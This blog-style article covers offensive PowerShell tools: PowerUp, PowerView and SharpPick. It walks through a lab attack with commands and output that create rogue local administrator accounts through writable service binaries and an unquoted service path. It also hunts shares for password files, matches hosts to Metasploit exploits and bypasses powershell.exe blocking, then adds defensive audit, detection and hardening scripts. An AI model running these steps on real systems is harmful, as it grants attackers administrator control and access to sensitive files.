I want a "Red Teaming"
Michael Schneider
PowerShell is a tool with many uses. In earlier Labs articles, I have covered the basics of PowerShell in the context of penetration testing and I’ve tried to block PowerShell. Here, I’ll show you how to use PowerShell as an offensive tool. To that end, I have used PowerTools, which is part of the Veil-Framework project.
PowerUp is a tool that supports local privilege escalation attacks against Microsoft Windows systems. It was developed by Will Schroeder alias @harmj0y. PowerUp consists of a single PS1 file and is loaded into a PowerShell session using the command Import-Module. The function Invoke-AllChecks checks the system configuration and lists possible attack vectors. Running this function on a Windows 9 client in my test environment, I found two services that I can manipulate using normal user privileges.
PS C:\Tools\PowerUp> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Use 'Write-UserAddServiceBinary' or 'Write-CMDServiceBinary' to abuse
[+] Unquoted service path: ProcessExplorerService - C:\Program Files\procexp.exe
[+] Unquoted service path: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe
[*] Checking service executable permissions...
[*] Use 'Write-ServiceEXE -ServiceName SVC' or 'Write-ServiceEXECMD' to abuse
[+] Vulnerable service executable: ProcessExplorerService - C:\Program Files\procexp.exe
[+] Vulnerable service executable: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe
[*] Checking service permissions...
[*] Checking for unattended install files...
[*] Checking %PATH% for potentially hijackable .dll locations...
[*] Checking for AlwaysInstallElevated registry key...
[*] Checking for Autologon credentials in registry...
[*] Checking for encrypted web.config strings...
[*] Checking for encrypted application pool and virtual directory passwords...
There are two possible attack vectors for each service. The service ProcessExplorerService grants regular local users write access to the file procexp.exe. Therefore, any other file can replace this file. There’s a PowerUp function called Write-ServiceEXE that creates a file which in turn adds a local user with local administrator privileges to the system. This file is used to overwrite the service’s executable. To retain the ability to reverse this process after the user has been created, the original file should be backed up. Write-ServiceEXE automatically creates a backup of the file it replaces.
Before the attack, an attacker should check whether the user account in use has sufficient rights to create a copy of a file in the directory. If this is not the case, the file needs to be backed up manually in order to remain as undetected as possible and to be able to reverse the process once the file in the directory has been replaced.
The following example produces an error message: the backup of procexp.exe failed, but the file has been overwritten nevertheless. Regardless of this, when the service starts up again, the manipulated file is executed and the user scip_admin is created. The result: the attacker has a local administrator account at his disposal.
PS C:\Tools\PowerUp> Write-ServiceEXE -ServiceName ProcessExplorerService -UserName scip_admin
Move-Item : Access to the path is denied.
At C:\Tools\PowerUp\PowerUp.ps1:689 char:13
+             Move-Item $ServicePath $BackupPath
+             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Program Files\procexp.exe:FileInfo) [Move-Item], UnauthorizedAccessException
    + FullyQualifiedErrorId : MoveFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.MoveItemCommand
[*] Binary for service 'ProcessExplorerService' to create user 'scip_admin : Password123!' written to 'C:\Program Files\procexp.exe'
When the service ProcessMonitorService was defined, the path to its executable was specified without quotation marks. The complete path is C:\Program Files\Sysinternals\Process Monitor\Procmon.exe. When starting the service, Windows will look for an executable after every space in the path. Therefore, it doesn’t just look for Procmon.exe but also for the following files, in case they exist:
C:\Program.exe
C:\Program Files\Sysinternals\Process.exe
In order to exploit this misconfiguration, an attacker needs write access to one of these directories. By default, unprivileged users do not have write access to directories under C:\Program Files. In this example, however, the permissions of the sub-directory Sysinternals allow regular users to write files. Using the PowerUp function Write-UserAddServiceBinary, an attacker can create a file that creates a new user. This file is copied to the directory Sysinternals and named Process.exe. When the service is restarted, a new user named scip_admin2 is created. The result: the attacker has a local administrator account at his disposal.
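The two PowerUp findings above (unquoted service paths and service binaries writable by regular users) can be audited from the defender's side with plain PowerShell. The following script is an added example, not code from the article or from the PowerTools project; it assumes English-language identity names (BUILTIN\Users etc.) and needs only normal user rights to read the service definitions and ACLs.

```powershell
# Added example: audit services for unquoted paths and user-writable binaries/directories.
# Identity names are the English defaults; adjust them on localized systems.
$weakIdentities = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone')

function Test-WeakWriteAccess {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        # Skip inherit-only ACEs: they apply to children, not to this object itself
        if ($ace.PropagationFlags -match 'InheritOnly') { continue }
        # Bit 2 = WriteData/CreateFiles; it is also set by Modify and FullControl
        $canWrite = (([int]$ace.FileSystemRights) -band 2) -ne 0
        if ($ace.AccessControlType -eq 'Allow' -and $canWrite -and
            $weakIdentities -contains $ace.IdentityReference.Value) { return $true }
    }
    return $false
}

function Get-UnquotedPathCandidates {
    param([string]$PathName)
    # Quoted paths and paths without spaces are not affected
    if ($PathName.TrimStart().StartsWith('"') -or $PathName -notmatch ' ') { return @() }
    $exeEnd = $PathName.IndexOf('.exe', [StringComparison]::OrdinalIgnoreCase)
    if ($exeEnd -lt 0) { return @() }
    $exePath = $PathName.Substring(0, $exeEnd)   # drop ".exe" and any arguments
    $candidates = @()
    $idx = $exePath.IndexOf(' ')
    while ($idx -gt 0) {
        # Windows probes "<prefix up to this space>.exe" before the real binary
        $candidates += $exePath.Substring(0, $idx) + '.exe'
        $idx = $exePath.IndexOf(' ', $idx + 1)
    }
    return $candidates
}

$report = foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if (-not $svc.PathName) { continue }
    foreach ($cand in Get-UnquotedPathCandidates $svc.PathName) {
        [pscustomobject]@{ Service = $svc.Name; Finding = 'Unquoted path'; Path = $cand
                           WritableByUsers = Test-WeakWriteAccess (Split-Path -Path $cand -Parent) }
    }
    # The binary itself: strip surrounding quotes and arguments, then check its ACL
    $exe = if ($svc.PathName -match '^"([^"]+)"') { $Matches[1] }
           elseif ($svc.PathName -match '^(.+?\.exe)') { $Matches[1] } else { $svc.PathName }
    if (Test-WeakWriteAccess $exe) {
        [pscustomobject]@{ Service = $svc.Name; Finding = 'Writable binary'; Path = $exe; WritableByUsers = $true }
    }
}
$report | Format-Table -AutoSize
```

For the service from the article this yields C:\Program.exe and C:\Program Files\Sysinternals\Process.exe as candidates; a row with WritableByUsers set to True is the condition PowerUp reports as exploitable.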
PowerView, also developed by Will Schroeder, is a tool that uses Windows domain functions in order to gather information about a network and its users. All of the tool’s options send legitimate requests that can be executed with the rights of a domain user. Some functions, called MetaFunctions, have their origin in a tool named netview by security researcher Rob Fuller alias mubix. It doesn’t take much to find information about users, computers and shares.
PS C:\Tools\PowerView> Invoke-Netview
Running Netview with delay of 0
[+] Domain Controller: dc01.labs.scip.ch
[*] Total number of hosts: 2
[+] Server: dc01.labs.scip.ch
[+] IP: 192.168.78.100
[+] dc01.labs.scip.ch - Share: ADMIN$ : Remote Admin
[+] dc01.labs.scip.ch - Share: Backup$ :
[+] dc01.labs.scip.ch - Share: C$ : Default share
[+] dc01.labs.scip.ch - Share: Data :
[+] dc01.labs.scip.ch - Share: IPC$ : Remote IPC
[+] dc01.labs.scip.ch - Share: NETLOGON : Logon server share
[+] dc01.labs.scip.ch - Share: SYSVOL : Logon server share
[+] dc01.labs.scip.ch - Share: Users :
[+] Server: client02.labs.scip.ch
[+] IP: 192.168.78.135
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\sysop
[+] client02.labs.scip.ch - Logged-on - LABS\\jdoe
[+] client02.labs.scip.ch - Share: ADMIN$ : Remote Admin
[+] client02.labs.scip.ch - Share: C$ : Default share
[+] client02.labs.scip.ch - Share: IPC$ : Remote IPC
The command Invoke-ShareFinder crawls the network and lists shares by system. Even hidden shares, suffixed with $, appear in the list; these shares are not displayed in Windows Explorer’s default view. Using Invoke-FileFinder, an attacker can search for files in the listed shares. Called without any additional parameters, it looks for files containing the strings pass, sensitive, secret, admin, login or unattend*.xml in their filename. Additional search patterns and strings can be supplied using -Terms. In the following example, I search for ZIP files.
PS C:\Tools\PowerView> Invoke-FileFinder

FullName       : \\dc01.labs.scip.ch\Backup$\passwords.txt
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:40
LastWriteTime  : 02.07.2015 07:18:06
Length         : 44

PS C:\Tools\PowerView> Invoke-FileFinder -Terms *.zip

FullName       : \\dc01.labs.scip.ch\Backup$\backup-01.zip
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:13
LastWriteTime  : 02.07.2015 07:17:13
Length         : 0

FullName       : \\dc01.labs.scip.ch\Backup$\backup-02.zip
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:25
LastWriteTime  : 02.07.2015 07:17:13
Length         : 0

FullName       : \\dc01.labs.scip.ch\Backup$\backup-03.zip
Owner          : BUILTIN\Administrators
LastAccessTime : 02.07.2015 07:17:32
LastWriteTime  : 02.07.2015 07:17:13
Length         : 0
Every computer object in Active Directory carries the name of the operating system, including its version and Service Pack. The function Get-ExploitableSystems reads this information and cross-references it with a list of publicly known exploits.
PS C:\Tools\PowerView> Get-ExploitableSystems

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms10_061_spoolss
CVE             : http://www.cvedetails.com/cve/2010-2729

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms10_061_spoolss
CVE             : http://www.cvedetails.com/cve/2010-2729

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms08_067_netapi
CVE             : http://www.cvedetails.com/cve/2008-4250

ComputerName    : dc01.labs.scip.ch
OperatingSystem : Windows Server 2008 R2 Standard
ServicePack     :
LastLogon       : 02.07.2015 07:10:13
MsfModule       : exploit/windows/smb/ms09_050_smb2_negotiate_func_index
CVE             : http://www.cvedetails.com/cve/2009-3103
The project PowerPick by pentester and red teamer Justin Warner alias @sixdub has one goal: use PowerShell features without powershell.exe. It’s similar to PS2EXE, which I spotlighted in A Story About Blocking PowerShell. While PS2EXE encapsulates a PS script in an executable file, SharpPick is able to execute arbitrary PS scripts from files, resources or URLs directly. To achieve this, the script is handed to sharppick.exe as a parameter. Therefore, even if powershell.exe is blocked, PS scripts can still be executed.
C:\Program Files\Sysinternals>SharpPick.exe -f C:\Tools\PowerUp\PowerUp.ps1
[*] Running Invoke-AllChecks
[*] Checking if user is in a local group with administrative privileges...
[*] Checking for unquoted service paths...
[*] Use 'Write-UserAddServiceBinary' or 'Write-CMDServiceBinary' to abuse
[+] Unquoted service path: ProcessExplorerService - C:\Program Files\procexp.exe
[+] Unquoted service path: ProcessMonitorService - C:\Program Files\Sysinternals\Process Monitor\Procmon.exe
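Because SharpPick still has to load the PowerShell engine (System.Management.Automation) into its own process, a defender can spot such hosts by looking for that DLL in processes that are not powershell.exe. The function below is an added example, not part of the article or the PowerPick project; it assumes an elevated session, since reading the module list of other users' processes is otherwise denied.

```powershell
# Added example: find processes that host the PowerShell engine without being a
# known PowerShell host (powershell.exe, powershell_ise.exe, pwsh.exe).
function Get-UnmanagedPowerShellProcess {
    $knownHosts = @('powershell', 'powershell_ise', 'pwsh')
    foreach ($proc in Get-Process) {
        if ($knownHosts -contains $proc.ProcessName) { continue }
        try {
            # Throws for protected processes or, without elevation, other users' processes
            $modules = $proc.Modules | ForEach-Object { $_.ModuleName }
        } catch { continue }
        # The engine may be loaded as the IL assembly or its NGEN image (*.ni.dll)
        $engine = $modules | Where-Object { $_ -match '^System\.Management\.Automation(\.ni)?\.dll$' }
        if ($engine) {
            [pscustomobject]@{
                Name      = $proc.ProcessName
                ProcessId = $proc.Id
                Path      = $proc.Path
                EngineDll = ($engine -join ', ')
            }
        }
    }
}

Get-UnmanagedPowerShellProcess | Format-Table -AutoSize
```

Since the same engine executes the script, PowerShell module and script block logging configured via Group Policy still record what SharpPick runs, even though powershell.exe never starts.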
There’s no universal defence against the attacks described in this article. Defence against attacks like these begins with the configuration of the operating system and the network.
Apart from these measures, further control mechanisms such as an application whitelist are needed. If it is known which directories are used by running programs, then other directories such as the user profile should be configured so that the execution of files is not permitted. Also make sure that executables cannot be stored there. Starting with Windows Server 2008, Microsoft has added the File Screening feature, which defines which file types may be stored in shared folders. Using this feature, it’s possible to prevent executables from being stored.
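Two of these measures applied to the findings from this article, as an added example (not code from the article): quoting the unquoted service path from the PowerUp output, and a File Screening rule on a share. The share path is a placeholder; the FSRM cmdlets assume the File Server Resource Manager feature is installed and 'Executable Files' is the built-in file group of that name. Both steps require administrative rights.

```powershell
# Added example, part 1: quote the service binary path so Windows stops probing
# C:\Program.exe and C:\Program Files\Sysinternals\Process.exe at service start.
$serviceName = 'ProcessMonitorService'
$svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$serviceName'"
if ($svc -and -not $svc.PathName.TrimStart().StartsWith('"')) {
    # Win32_Service.Change rewrites the path; a return value of 0 means success
    $quoted = '"' + $svc.PathName + '"'
    $result = Invoke-CimMethod -InputObject $svc -MethodName Change -Arguments @{ PathName = $quoted }
    "Change returned $($result.ReturnValue) for $serviceName -> $quoted"
}

# Part 2: File Screening (FSRM, Windows Server 2008 and later) on a share, so that
# users can no longer drop executables there. Path is a placeholder.
Import-Module FileServerResourceManager
$sharePath = 'D:\Shares\Data'
New-FsrmFileScreen -Path $sharePath -IncludeGroup 'Executable Files' -Active `
    -Description 'Block executables on the Data share'
Get-FsrmFileScreen -Path $sharePath | Select-Object Path, IncludeGroup, Active
```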
Using a combination of control mechanisms, the attacks I’ve outlined in this article can be mitigated and the attack surface of a local system as well as the internal network can be significantly reduced.